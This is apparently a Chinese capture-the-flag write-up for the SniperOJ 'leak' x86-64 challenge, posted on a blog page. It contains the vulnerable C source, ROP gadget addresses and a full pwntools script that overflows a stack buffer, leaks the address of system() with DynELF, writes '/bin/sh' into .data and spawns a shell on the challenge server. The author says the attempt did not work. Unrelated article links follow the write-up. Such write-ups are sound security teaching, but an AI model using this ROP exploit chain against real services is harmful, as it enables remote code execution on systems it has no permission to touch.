SniperOJ-leak-x86-64
题目源码
#include <stdio.h>
#include <unistd.h>
#include <string.h>
void init(){
setvbuf(stdout, NULL, _IOLBF, 0);
}
void welcome(){
char *words = "Welcome to Sniperoj!\nDancing in shackles, Right?\n";
write(1, words, strlen(words));
}
void vuln(){
char buffer[16] = {0};
read(0, buffer, 0x80);
}
int main(){
init();
welcome();
vuln();
return 0;
}
题目是leak,提示是dynelf,pwntools里有个函数dynelf可以泄露内存任意地址至少一字节数据
linux64位下函数参数前六位是靠RDI, RSI, RDX, RCX, R8和 R9传递的,如果还有更多参数再依靠栈传递,这里需要寻找合适的gadgets进行rop.寻找gadgets的工具,我用的是ROPgadget,下载地址
ROPgadget: https://github.com/JonathanSalwan/ROPgadget/tree/master
找到两处可用gadgets
$ ROPgadget --binary leak --only "pop|ret"
============================================================
0x0000000000400733 : pop rdi ; ret
0x0000000000400731 : pop rsi ; pop r15 ; ret
没有找到类似pop rdx;ret的gadgets,这里先暂且不管,看看只靠两个参数能不能做下去。
先做些预备工作
elf = ELF('leak')
write_plt = p64(elf.symbols['write'])
start_addr = p64(elf.symbols['_start'])
read_plt = p64(elf.symbols['read'])
data_addr = p64(elf.symbols['__data_start'])
junk = "A" * (0x10 + 8)
#Io = process("./leak")
Io = remote("pwn.sniperoj.cn", 30008)
再编写leak函数
def leak(addr):
Io.recvuntil("Dancing in shackles, Right?\n")
payload = junk + p64(0x0000000000400733) + p64(1) + p64(0x0000000000400731) + p64(addr) + start_addr + write_plt + start_addr
Io.send(payload)
leaked = Io.recv(8)
print "[%s] -> [%s] = [%s]" % (hex(addr), hex(u64(leaked)), repr(leaked))
return leaked
leak出system的地址
d = DynELF(leak, elf=ELF("leak"))
system_addr = d.lookup('system', 'libc')
print "[system()] -> [%s]" % (hex(system_addr))
将/bin/sh写入.data段
payload = junk + p64(0x0000000000400733) + p64(0) + p64(0x0000000000400731) + data_addr + start_addr + read_plt + start_addr
Io.send(payload)
Io.send("/bin/sh\x00")
调用system("/bin/sh")
payload = junk + p64(0x0000000000400733) + data_addr + p64(system_addr) + p64(0xFFFFFFFF)
Io.send(payload)
完整脚本如下
#!/usr/bin/env python
# coding:utf-8
from pwn import * def read_output():
Io.recvuntil("Dancing in shackles, Right?\n") def leak(addr):
read_output()
payload = junk + p64(0x0000000000400733) + p64(1) + p64(0x0000000000400731) + p64(addr) + start_addr + write_plt + start_addr
Io.send(payload)
leaked = Io.recv(8)
print "[%s] -> [%s] = [%s]" % (hex(addr), hex(u64(leaked)), repr(leaked))
return leaked elf = ELF('leak')
write_plt = p64(elf.symbols['write'])
start_addr = p64(elf.symbols['_start'])
read_plt = p64(elf.symbols['read'])
data_addr = p64(elf.symbols['__data_start'])
junk = "A" * (0x10 + 8) #Io = process("./leak")
Io = remote("pwn.sniperoj.cn", 30008) # leak the address of system()
d = DynELF(leak, elf=ELF("leak"))
system_addr = d.lookup('system', 'libc')
print "[system()] -> [%s]" % (hex(system_addr)) #system_addr 0x7f279f108390 # write /bin/sh
read_output()
payload = junk + p64(0x0000000000400733) + p64(0) + p64(0x0000000000400731) + data_addr + start_addr + read_plt + start_addr
Io.send(payload) # send /bin/sh
Io.send("/bin/sh\x00") read_output()
payload = junk + p64(0x0000000000400733) + data_addr + p64(system_addr) + p64(0xFFFFFFFF)
Io.send(payload) # interactive()
Io.interactive()
利用通用gadgets进行rop又失败了,很伤心,原以为自己已经找到利用方法了,唉,我好菜
SniperOJ-leak-x86-64的更多相关文章
- < IOS > X-code 5.1 x86 - 64 编译问题
关于xcode 5.1 x86 - 64 编译问题 坐等了N久,终于IOS 7.1 发布了,作为一个果粉,忍不住第一时间升级了.结果用设备测试的时候,出问题了,一直检测不到设备,哈哈,纠结了半 ...
- Ubuntu x86 64 settup nginx rtmp server
常常搭建nginxserver,可是好像每次的情况都不同,这次具体记录这个过程: 平台:unbutu 10.04 内核:2.6.32-33-generic 1, 编译环境搭建. sudo apt-ge ...
- centos(x86 64位系统)使用boost
1. 安装gcc,g++,make等开发环境 yum groupinstall "Development Tools" 2. 安装boost yum install boost b ...
- Openfiler能把标准x86/64架构的系统变成一个强大的NAS、SAN存储和IP存储网关
http://www.linuxprob.com/vmware-openfiler.html
- 如何查看linux系统是32位还是64位
1.#uname -a 如果有x86_64就是64位的,没有就是32位的 这是64位的 # uname -a Linux desktop 2.6.35-23-generic #37-Ubuntu ...
- 在win8.1 64位系统+cocos2d-x2.2.3下搭建android交叉编译环境
搭建前须要下载的软件包(默认已搭建好cocos2d-x而且可在VS上执行,本人VS版本号为2013): 1:java 下载地址:http://www.java.com/zh_CN/download/m ...
- 64位 windows10,安装配置MYSQL8.0.13
MySQL的安装配置过程,一查网上一大堆,但是每个人在安装配置的过程中都会碰到一些问题,因为安装的版本不一样,有些命令可能就不适用了.所以安装之前一定先确认好你的版本号. 下面开始安装MYSQL8.0 ...
- 怎么查看linux系统是32位还是64位
1.#uname -a如果有x86_64就是64位的,没有就是32位的 这是64位的 # uname -a Linux desktop 2.6.35-23-generic #20-Ubuntu SMP ...
- oracle 数据库安装环境,需要大汇总
Oracle Database (RDBMS) on Unix AIX,HP-UX,Linux,Mac OS X,Solaris,Tru64 Unix Operating Systems Ins ...
- 《深入理解JAVA虚拟机》笔记1
java程序运行时的内存空间,按照虚拟机规范有下面几项: )程序计数器 指示下条命令执行地址.当然是线程私有,不然线程怎么能并行的起来. 不重要,占内存很小,忽略不计. )方法区 这个名字很让我迷惑. ...
随机推荐
- Codeforces764C【DFS】
前言,根据最终图的样貌搞真厉害 "缩点判根度为结点数-1"牛逼 ----- 题意: 找一个根使得不带根的所有子树内部颜色都相同: 思路: 如果存在两个颜色不一样的连在一起,根就是他 ...
- Unity3D研究院之IOS&Android收集Log文件(六十二)
开发项目的时候尤其在处理与服务器交互这块,如果服务端程序看不到客户端请求的Log信息,那么无法修改BUG.在Windows上Unity会自动讲Log文件写入本地,但是在IOS和Android上确没有这 ...
- jstl标签库jar包下载
- 51Nod 1134 最长递增子序列(动态规划O(nlogn))
#include <iostream> #include <algorithm> #include <stdio.h> #define MAXN 50010 usi ...
- max函数的用法
题目是 给你一段全英文本,求这段文本中出现次数最多的字母 import string def checkio(text): text = text.lower() return max(strin ...
- [LOJ#10042] 收集雪花
题目链接: 点我 题目分析: 双指针扫描可以保证在\(O(n)\)的时间复杂度内处理这道题.另外,虽然这个题标签是\(hash\),但是字符串\(hash\)是可以卡掉的,所以建议直接离散化. 维护两 ...
- 洛谷P2514||bzoj2426 [HAOI2010]工厂选址
洛谷P2514 bzoj2426 其实是个简单的贪心,然而不适合在脑子不清醒的时候做...看不懂题意续了1个小时 很容易发现应该枚举新建哪个发电厂,对于这种方案就是取其中b吨煤运到原来发电厂,取剩下( ...
- ORA-00972_标识符过长
执行SQL查询报:"ORA-00972:标识符过长"错误. 执行SQL: SELECT T.F_FTBS, T.F_TZMC "X组/XXXX/XXXX名称", ...
- 109 Convert Sorted List to Binary Search Tree 有序链表转换二叉搜索树
给定一个单元链表,元素按升序排序,将其转换为高度平衡的BST.对于这个问题,一个高度平衡的二叉树是指:其中每个节点的两个子树的深度相差不会超过 1 的二叉树.示例:给定的排序链表: [-10, -3, ...
- 18113 Secret Book of Kungfu 按位DFS
http://acm.scau.edu.cn:8000/uoj/mainMenu.html 18113 Secret Book of Kungfu 该题有题解 时间限制:1000MS 内存限制:65 ...